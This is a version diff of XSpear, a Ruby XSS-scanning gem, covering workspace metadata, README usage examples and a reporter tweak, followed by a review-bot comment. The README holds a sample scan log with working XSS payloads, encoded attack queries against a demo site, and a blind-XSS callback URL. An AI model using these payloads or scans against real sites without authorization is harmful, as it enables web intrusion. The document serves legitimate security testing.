XSpear 1.0.6 → 1.0.7

checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 79c560a49f42b36d468188a502f3b8c16f78b2b0c8a11af550deeb083978529e
4
- data.tar.gz: d64291c47fddcee3d326ad2cb1db999c52fd992e3baf954b1b6fcdd47137f773
3
+ metadata.gz: 0c0ac315484162b92f2f958d2ddc70736bec0f164349575529e763f154366c37
4
+ data.tar.gz: eab6a1c2350ea1bf4467fcd41cfd00a61c58d1693503e4437ae86418e348bda1
5
5
  SHA512:
6
- metadata.gz: 3af5242c09f427957569d96ab94f239f774471594d127e4f33ca3c92db2ef1787cf59adbad739c18944340635dbe6f3b5cb10261d2d9e144379505e5356a85b5
7
- data.tar.gz: 4b2d8e9715b15fe2637d20655837e084d59dafbda2472ecc31a135dd8d3ee3469742c8d81cd8c372c323038d5ec07d70dafca7fb3bf2f5da4b1e758513e13256
6
+ metadata.gz: e4463bb21d6b1cf918c290d7a3540d93510f4f9cb68ebc6fad7319377d579228aa754b832e5d077f63e24b35d2ea73fa492a4a21351c0f26880b6c1f52065016
7
+ data.tar.gz: bf64aa0df617fdddfb8d07803a8dbba0bb2822579b56fbc93a0d17f73aced699ad2f46bfd01a51ae9e614d3287b016e2419eaba35384e17d76c038c3ea52d567
data/.idea/workspace.xml CHANGED
@@ -3,7 +3,10 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
6
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
7
10
  </list>
8
11
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
9
12
  <option name="SHOW_DIALOG" value="false" />
@@ -16,41 +19,37 @@
16
19
  </component>
17
20
  <component name="FileEditorManager">
18
21
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
19
- <file pinned="false" current-in-tab="false">
20
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
21
- <provider selected="true" editor-type-id="text-editor">
22
- <state relative-caret-position="525">
23
- <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
24
- </state>
25
- </provider>
26
- </entry>
27
- </file>
28
22
  <file pinned="false" current-in-tab="false">
29
23
  <entry file="file://$PROJECT_DIR$/README.md">
30
24
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
31
25
  <state split_layout="SPLIT">
32
- <first_editor relative-caret-position="599">
33
- <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
26
+ <first_editor relative-caret-position="2113">
27
+ <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
34
28
  </first_editor>
35
29
  <second_editor />
36
30
  </state>
37
31
  </provider>
38
32
  </entry>
39
33
  </file>
40
- <file pinned="false" current-in-tab="true">
34
+ <file pinned="false" current-in-tab="false">
35
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
36
+ <provider selected="true" editor-type-id="text-editor" />
37
+ </entry>
38
+ </file>
39
+ <file pinned="false" current-in-tab="false">
41
40
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
42
41
  <provider selected="true" editor-type-id="text-editor">
43
- <state relative-caret-position="370">
44
- <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
42
+ <state relative-caret-position="426">
43
+ <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
45
44
  </state>
46
45
  </provider>
47
46
  </entry>
48
47
  </file>
49
- <file pinned="false" current-in-tab="false">
48
+ <file pinned="false" current-in-tab="true">
50
49
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
51
50
  <provider selected="true" editor-type-id="text-editor">
52
- <state relative-caret-position="392">
53
- <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
51
+ <state relative-caret-position="253">
52
+ <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
54
53
  </state>
55
54
  </provider>
56
55
  </entry>
@@ -113,10 +112,10 @@
113
112
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
114
113
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
115
114
  <option value="$PROJECT_DIR$/exe/XSpear" />
116
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
115
  <option value="$PROJECT_DIR$/README.md" />
118
- <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
116
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
119
117
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
118
+ <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
120
119
  </list>
121
120
  </option>
122
121
  </component>
@@ -231,7 +230,7 @@
231
230
  <workItem from="1562942816004" duration="15337000" />
232
231
  <workItem from="1563638656518" duration="4985000" />
233
232
  <workItem from="1563809961097" duration="4237000" />
234
- <workItem from="1563893538891" duration="2230000" />
233
+ <workItem from="1563893538891" duration="3583000" />
235
234
  </task>
236
235
  <task id="LOCAL-00001" summary="init update">
237
236
  <created>1562945899597</created>
@@ -478,17 +477,38 @@
478
477
  <option name="project" value="LOCAL" />
479
478
  <updated>1563895638242</updated>
480
479
  </task>
481
- <option name="localTasksCounter" value="36" />
480
+ <task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
481
+ <created>1563895850670</created>
482
+ <option name="number" value="00036" />
483
+ <option name="presentableId" value="LOCAL-00036" />
484
+ <option name="project" value="LOCAL" />
485
+ <updated>1563895850670</updated>
486
+ </task>
487
+ <task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
488
+ <created>1563896026689</created>
489
+ <option name="number" value="00037" />
490
+ <option name="presentableId" value="LOCAL-00037" />
491
+ <option name="project" value="LOCAL" />
492
+ <updated>1563896026689</updated>
493
+ </task>
494
+ <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
495
+ <created>1563896886094</created>
496
+ <option name="number" value="00038" />
497
+ <option name="presentableId" value="LOCAL-00038" />
498
+ <option name="project" value="LOCAL" />
499
+ <updated>1563896886094</updated>
500
+ </task>
501
+ <option name="localTasksCounter" value="39" />
482
502
  <servers />
483
503
  </component>
484
504
  <component name="TimeTrackingManager">
485
- <option name="totallyTimeSpent" value="26789000" />
505
+ <option name="totallyTimeSpent" value="28142000" />
486
506
  </component>
487
507
  <component name="ToolWindowManager">
488
508
  <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
489
509
  <editor active="true" />
490
510
  <layout>
491
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
511
+ <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
492
512
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
493
513
  <window_info id="Favorites" order="2" side_tool="true" />
494
514
  <window_info anchor="bottom" id="Message" order="0" />
@@ -501,7 +521,7 @@
501
521
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
502
522
  <window_info anchor="bottom" id="Database Changes" order="8" />
503
523
  <window_info anchor="bottom" id="Version Control" order="9" />
504
- <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
524
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
505
525
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
506
526
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
507
527
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -514,9 +534,6 @@
514
534
  <option name="version" value="1" />
515
535
  </component>
516
536
  <component name="VcsManagerConfiguration">
517
- <MESSAGE value="init update" />
518
- <MESSAGE value="build gem and edit dependency" />
519
- <MESSAGE value="add gem &amp; edit code" />
520
537
  <MESSAGE value="edit gem dependency(runtime, developement)" />
521
538
  <MESSAGE value="Add json report and new build binary, edit readme" />
522
539
  <MESSAGE value="Add screenshot images" />
@@ -539,7 +556,10 @@
539
556
  <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
540
557
  <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
541
558
  <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
542
- <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit report &amp; scanning format" />
559
+ <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
560
+ <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
561
+ <MESSAGE value="(1.0.6) Edit README.md" />
562
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit README.md" />
543
563
  </component>
544
564
  <component name="editorHistoryManager">
545
565
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -576,13 +596,6 @@
576
596
  </state>
577
597
  </provider>
578
598
  </entry>
579
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
580
- <provider selected="true" editor-type-id="text-editor">
581
- <state relative-caret-position="15">
582
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
583
- </state>
584
- </provider>
585
- </entry>
586
599
  <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
587
600
  <provider selected="true" editor-type-id="text-editor">
588
601
  <state relative-caret-position="105">
@@ -596,27 +609,37 @@
596
609
  <entry file="file:///usr/local/bin/rake">
597
610
  <provider selected="true" editor-type-id="text-editor" />
598
611
  </entry>
612
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
613
+ <provider selected="true" editor-type-id="text-editor" />
614
+ </entry>
599
615
  <entry file="file://$PROJECT_DIR$/README.md">
600
616
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
601
617
  <state split_layout="SPLIT">
602
- <first_editor relative-caret-position="599">
603
- <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
618
+ <first_editor relative-caret-position="2113">
619
+ <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
604
620
  </first_editor>
605
621
  <second_editor />
606
622
  </state>
607
623
  </provider>
608
624
  </entry>
609
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
625
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
610
626
  <provider selected="true" editor-type-id="text-editor">
611
- <state relative-caret-position="392">
612
- <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
627
+ <state relative-caret-position="15">
628
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
613
629
  </state>
614
630
  </provider>
615
631
  </entry>
616
632
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
617
633
  <provider selected="true" editor-type-id="text-editor">
618
- <state relative-caret-position="370">
619
- <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
634
+ <state relative-caret-position="426">
635
+ <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
636
+ </state>
637
+ </provider>
638
+ </entry>
639
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
640
+ <provider selected="true" editor-type-id="text-editor">
641
+ <state relative-caret-position="253">
642
+ <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
620
643
  </state>
621
644
  </provider>
622
645
  </entry>
data/README.md CHANGED
@@ -10,9 +10,12 @@ XSpear is XSS Scanner on ruby gems
10
10
  + Reflected Params
11
11
  + Filtered test `event handler` `HTML tag` `Special Char`
12
12
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
13
+ - Dynamic/Static Analysis
14
+ + Find SQL Error pattern
15
+ + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
16
+ + Analysis Other headers..(Server version, Content-Type, etc...)
13
17
  - XSpear running on ruby code(with Gem library)
14
- - Dynamic/Static Analysis(Find SQL Error, etc..)
15
- - Show table base report and testing raw query(url)
18
+ - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
16
19
  - Testing at selected parameters
17
20
  - Support output format `cli` `json`
18
21
  + cli: summary, filtered rule(params), Raw Query
@@ -99,80 +102,100 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
99
102
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
100
103
  ```
101
104
 
105
+ **set thread**
106
+ ```
107
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
108
+ ```
109
+
102
110
  **testing at selected parameters**
103
111
  ```
104
112
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
105
113
  ```
106
114
 
115
+ **testing blind xss**
116
+ ```
117
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
118
+ ```
119
+
107
120
  etc...
108
121
 
109
122
  ### Sample log
110
123
  **Scanning XSS**
111
124
  ```
112
- $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
113
- ) (
114
- ( /( )\ )
115
- )\())(()/( ( ) (
116
- ((_)\ /(_))` ) ))\ ( /( )(
117
- __((_)(_)) /(/( /((_))(_))(()\
118
- \ \/ // __|((_)_\ (_)) ((_)_ ((_)
119
- > < \__ \| '_ \)/ -_)/ _` || '_|
120
- /_/\_\|___/| .__/ \___|\__,_||_| />
121
- |_| \ /<
122
- {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
123
- / \<
124
- \> [ v1.0.5 ]
125
- [*] creating a test query.
126
- [*] test query generation is complete. [138 query]
127
- [*] starting test and analysis. [10 threads]
128
- [I] [01:44:06] [param: cat][Found SQL Error Pattern]
129
- [I] [01:44:06] reflected rEfe6[param: cat][reflected parameter]
130
- [I] [01:44:08] reflected onhwul=64[param: cat][not filtered event handler on{any} pattern]
131
- [-] [01:44:14] not reflected <svg/onload=alert(45)>
132
- [H] [01:44:14] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
133
- [H] [01:44:15] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
134
- [-] [01:44:15] not reflected <img/src onerror=alert(45)>
135
- [-] [01:44:20] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
136
- =>
137
- [-] [01:44:21] not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
138
- =>
139
- [V] [01:44:21] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
140
- => [param: cat][triggered <script>alert(45)</script>]
141
- [-] [01:44:22] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
142
- =>
143
- [V] [01:44:22] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
144
- => [param: cat][triggered <svg/onload=alert(45)>]
145
- [-] [01:44:23] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
146
- =>
147
- [*] finish scan. the report is being generated..
148
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
149
- | [ XSpear report ] |
150
- | http://testphp.vulnweb.com/listproducts.php?cat=z |
151
- | 2019-07-23 01:44:05 +0900 ~ 2019-07-23 01:44:23 +0900 Found 7 issues. |
152
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
153
- | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
154
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
155
- | 0 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
- | 1 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
157
- | 2 | INFO | FILERD RULE | cat | onhwul=64 | not filtered event handler on{any} pattern |
158
- | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
159
- | 4 | HIGH | XSS | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
160
- | 5 | VULN | XSS | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
161
- | 6 | VULN | XSS | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
162
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
163
- < Not Filtered >
164
- [cat] param
165
- + Special Char: `,\,<,|,(,;,>,',),+,-,{,.,],,,[,},:,=,$
166
- + Event Handler: "onAfterUpdate","onAbort","onBeforeCut","onAfterPrint","onBeforeActivate","onActivate","onBeforeCopy","onBeforeUpdate","onBeforeEditFocus","onBeforeDeactivate","onBlur","onBounce","onCellChange","onBegin","onBeforePrint","onBeforeUnload","onBeforePaste","onCut","onContextMenu","onCopy","onDataSetComplete","onClick","onDblClick","onControlSelect","onDataSetChanged","onChange","onDataAvailable","onDragEnd","onDragOver","onDrag","onDragLeave","onDragStart","onDeactivate","onDragEnter","onDragDrop","onDrop","onEnd","onFinish","onHashChange","onFocusIn","onErrorUpdate","onHelp","onFocusOut","onInput","onFocus","onError","onFilterChange","onMouseDown","onKeyPress","onMediaComplete","onLayoutComplete","onMediaError","onKeyUp","onMessage","onKeyDown","onLoad","onLoseCapture","onMouseEnter","onMouseUp","onMouseLeave","onMove","onMoveEnd","onMoveStart","onMouseOver","onMouseMove","onMouseOut","onMouseWheel","onProgress","onOutOfSync","onPopState","onPropertyChange","onOffline","onOnline","onRedo","onPaste","onReadyStateChange","onPause","onResizeStart","onRowExit","onResume","onRowDelete","onRepeat","onReset","onResizeEnd","onReverse","onRowsEnter","onResize","onSelectionChange","onSyncRestored","onStart","onStop","onStorage","onRowInserted","onSelect","onSelectStart","onScroll","onSeek","onTrackChange","onUnload","onURLFlip","onSubmit","onTimeError","onUndo"
167
- + HTML Tag: "script","iframe"
168
- < Raw Query >
169
- [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
170
- [1] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
171
- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
172
- [3] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
173
- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
174
- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
175
- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
125
+ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
126
+ ) (
127
+ ( /( )\ )
128
+ )\())(()/( ( ) (
129
+ ((_)\ /(_))` ) ))\ ( /( )(
130
+ __((_)(_)) /(/( /((_))(_))(()\
131
+ \ \/ // __|((_)_\ (_)) ((_)_ ((_)
132
+ > < \__ \| '_ \)/ -_)/ _` || '_|
133
+ /_/\_\|___/| .__/ \___|\__,_||_| />
134
+ |_| \ /<
135
+ {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
136
+ / \<
137
+ \> [ v1.0.6 ]
138
+ [*] creating a test query.
139
+ [*] test query generation is complete. [149 query]
140
+ [*] starting test and analysis. [10 threads]
141
+ [I] [00:37:34] reflected 'XsPeaR
142
+ [-] [00:37:34] 'cat' Not reflected |XsPeaR
143
+ [I] [00:37:34] [param: cat][Found SQL Error Pattern]
144
+ [-] [00:37:34] 'STATIC' not reflected
145
+ [I] [00:37:34] reflected "XsPeaR
146
+ [-] [00:37:34] 'cat' Not reflected ;XsPeaR
147
+ [I] [00:37:34] reflected `XsPeaR
148
+ ...snip...
149
+ [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
150
+ [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
151
+ [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
152
+ [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
153
+ [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
154
+ [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
155
+ [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
156
+ [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
157
+ => [param: cat][triggered <script>alert(45)</script>]
158
+ [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
159
+ => [param: cat][triggered <svg/onload=alert(45)>]
160
+ [*] finish scan. the report is being generated..
161
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
162
+ | [ XSpear report ] |
163
+ | http://testphp.vulnweb.com/listproducts.php?cat=z |
164
+ | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |
165
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
166
+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
167
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
168
+ | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
169
+ | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 |
170
+ | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS |
171
+ | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html |
172
+ | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options |
173
+ | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP |
174
+ | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
175
+ | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
176
+ | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
177
+ | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
178
+ | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
179
+ | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
180
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
181
+ < Available Objects >
182
+ [cat] param
183
+ + Available Special Char: ' \ ` ] . : ) } [ { $
184
+ + Available Event Handler: "onActivate","onBeforeCopy","onAfterPrint","onAfterUpdate","onAbort","onBeforeActivate","onBeforeDeactivate","onBlur","onBeforeCut","onBounce","onBeforeUnload","onBeforeEditFocus","onBeforePaste","onBeforeUpdate","onBegin","onBeforePrint","onClick","onChange","onControlSelect","onDataSetChanged","onCopy","onDataSetComplete","onContextMenu","onDataAvailable","onCellChange","onCut","onDeactivate","onDblClick","onDragEnd","onDragOver","onDragDrop","onDrop","onDragStart","onDrag","onDragEnter","onDragLeave","onFilterChange","onFocusIn","onEnd","onHelp","onError","onErrorUpdate","onFocus","onFinish","onHashChange","onFocusOut","onLoad","onLoseCapture","onInput","onLayoutComplete","onKeyDown","onMessage","onKeyUp","onMediaError","onMediaComplete","onKeyPress","onMouseOver","onMove","onMouseEnter","onMouseWheel","onMouseLeave","onMoveEnd","onMouseDown","onMouseMove","onMouseUp","onMouseOut","onPropertyChange","onMoveStart","onPaste","onPopState","onOutOfSync","onProgress","onOnline","onReadyStateChange","onOffline","onPause","onResize","onReverse","onRepeat","onRedo","onResizeEnd","onRowExit","onReset","onRowsEnter","onResizeStart","onResume","onRowInserted","onScroll","onStorage","onSelectStart","onRowDelete","onSeek","onSelectionChange","onSelect","onStart","onStop","onUndo","onTrackChange","onURLFlip","onTimeError","onSyncRestored","onSubmit","onUnload"
185
+ + Available HTML Tag: "svg","iframe","script","audio","video","meta","frame","img","embeded","frameset","object","style"
186
+ < Raw Query >
187
+ [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
188
+ [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
189
+ [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
190
+ [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
191
+ [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
192
+ [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
193
+ [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
194
+ [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
195
+ [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
196
+ [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
197
+ [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
198
+ [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
176
199
  ```
177
200
 
178
201
  **to JSON**
@@ -232,6 +255,14 @@ class ScanCallbackFunc()
232
255
  end
233
256
  ```
234
257
 
258
+ Common Callback Class
259
+ - CallbackXSSSelenium
260
+ - CallbackErrorPatternMatch
261
+ - CallbackCheckHeaders
262
+ - CallbackStringMatch
263
+ - CallbackNotAdded
264
+ etc...
265
+
235
266
  ## Update
236
267
  if nomal user
237
268
  ```
@@ -266,5 +297,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
266
297
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
267
298
 
268
299
  ## ScreenShot
269
- <img src="https://user-images.githubusercontent.com/13212227/61649243-14a30c80-acec-11e9-9a20-73839c4ec580.png" width=100%>
300
+ <img src="https://user-images.githubusercontent.com/13212227/61726530-bf7aff80-adac-11e9-9ed8-ac8ecd358c0c.png" width=100%>
270
301
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
@@ -32,14 +32,14 @@ class XspearRepoter
32
32
  end
33
33
 
34
34
  def add_issue_first(type, issue, param, payload, pattern, description)
35
- rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
35
+ rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".red}
36
36
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
37
37
  @issue.insert(0,["-", rtype[type], rissue[issue], @method, param, pattern, description])
38
38
  @query.push payload
39
39
  end
40
40
 
41
41
  def add_issue(type, issue, param, payload, pattern, description)
42
- rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
42
+ rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".red}
43
43
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
44
44
  @issue << [@issue.size, rtype[type], rissue[issue], @method, param, pattern, description]
45
45
  @query.push payload
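Review bot: The colorized `rtype` values on the new lines of both `add_issue_first` and `add_issue` are written into the stored `@issue` rows rather than applied at print time, so any reporter that serializes those rows (the README in this same diff advertises a `json` output format) will presumably carry ANSI escape sequences in its TYPE field; the reporters themselves are not visible here, so confirm against the JSON path. Keep the stored value plain and colorize only in the CLI table renderer, and hoist the two identical literal hashes into frozen class constants, e.g. `RTYPE = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}.freeze` and likewise `RISSUE`, since both methods rebuild them on every call. `rtype[type]` also yields `nil` for an unknown severity code and silently inserts it into the row; `RTYPE.fetch(type)` would surface that mistake at the call site. The class header and the rest of `XspearRepoter` are outside this hunk.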
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.6"
2
+ VERSION = "1.0.7"
3
3
  end
